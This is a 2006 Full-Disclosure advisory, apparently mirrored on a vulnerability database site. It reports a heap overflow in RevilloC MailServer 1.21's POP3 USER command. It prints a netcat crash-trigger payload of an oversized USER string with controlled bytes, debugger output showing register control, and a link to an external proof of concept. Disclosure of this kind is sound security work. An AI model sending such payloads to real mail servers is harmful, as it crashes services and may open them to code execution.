Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11749
HistoryMar 08, 2006 - 12:00 a.m.

[Full-disclosure] RevilloC mail server USER command heap overflow

2006-03-0800:00:00
vulners.com
14
JSON

1-title:
Revilloc mail server "USER" command heap overflow

Product:
Revilloc MailServer and Proxy v 1.21 (http://www.revilloC.com)
The mail server is a central point for emails coming in and going out from
home or office
The service will work with any standard email client that supports POP3 and
SMTP.

2-Vulnerability Description:
sending a large buffer after USER commands
C:\>nc 127.0.0.1 110
+OK RevilloC POP3 Ready
USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a"
causes access violation when reading [dddddddd].
ntdll!wcsncat+0x387:
7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX]β€”>EBX pointe to
"\xdd"x4
ECX dddddddd
EAX FFFFFFFF

3-Status:
14/01/2006 Vendor contacted,No response

4-solution:
no patch no solution…use another mail server

5-credit:
securma massine from MorX Security Research Team

6-PoC/Exploit at:
http://www.morx.org/rev.txt

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON